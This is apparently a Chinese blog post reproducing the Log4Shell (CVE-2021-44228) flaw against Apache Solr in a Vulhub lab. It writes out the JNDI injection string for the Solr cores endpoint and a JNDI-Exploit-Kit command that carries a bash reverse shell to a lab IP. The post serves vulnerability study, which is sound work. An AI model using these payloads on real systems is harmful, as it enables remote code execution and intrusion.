log4jshell CVE-2021-44228 复现

漏洞介绍

Log4j 是 Apache 提供的一个非常流行的 Java 日志框架。漏洞编号 CVE‑2021‑44228,就被称作 "Log4Shell",该漏洞存在于 Log4j 2 版本(从 2.0‑beta9 到 2.14.1)中,因为其日志处理机制中对 JNDI(Java 命名与目录接口)查找没有做限制或验证。攻击者只要向日志字段输入恶意 JNDI 字符串(例如 ${jndi:ldap://攻击者IP/对象}),Log4j 就会去远端服务器加载 Java 对象,从而导致 远程代码执行(RCE)

复现

通过Vulhub快速搭建环境

bash 复制代码
D:\vulhub\log4j\CVE-2021-44228
docker compose up -d

进入页面,发现Apache Solr

POST参数位置存在漏洞

bash 复制代码
/solr/admin/cores?action=${jndi:ldap://xxx}

RCE

我这里使用的java环境为java11

使用JNDI-Exploit-Kit进行利用

https://github.com/pimps/JNDI-Exploit-Kit

也可以使用ysoserial生成java反序列化载荷进行利用

https://github.com/pimps/ysoserial-modified

bash 复制代码
java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -C 'bash -i >& /dev/tcp/192.168.10.69/4444 0>&1' -L 192.168.10.69:1234

成功得到shell

相关推荐
ShoreKiten19 小时前
DC-3靶机渗透--CTFer从0到1的进阶之路
安全·网络安全·渗透测试
kkkkkkkkl2421 小时前
Prompt 不只是提问:大模型的“输入程序”机制解析
log4j
de_wizard2 天前
Spring Boot 项目开发流程全解析
java·spring boot·log4j
阿蒙Amon2 天前
C#常用类库-详解Moq
开发语言·c#·log4j
steel80883 天前
Spring Boot 整合 log4j2 日志配置教程
spring boot·单元测试·log4j
Sombra_Olivia3 天前
Vulhub 中的 adminer CVE-2021-21311
安全·web安全·网络安全·渗透测试·vulhub
互联网散修3 天前
零基础鸿蒙应用开发第六节:复杂数据类型入门 —— 数组、元组与枚举
华为·log4j·harmonyos
vortex54 天前
文件上传漏洞绕过技术总结(含实操指南与防御方案)
linux·服务器·网络安全·渗透测试
Atomic121384 天前
隧道搭建之端口复用
web安全·网络安全·渗透测试
江沉晚呤时4 天前
C# 接口默认实现与依赖注入实战指南:.NET 9 企业级开发高级技巧
c#·log4j·.net·.netcore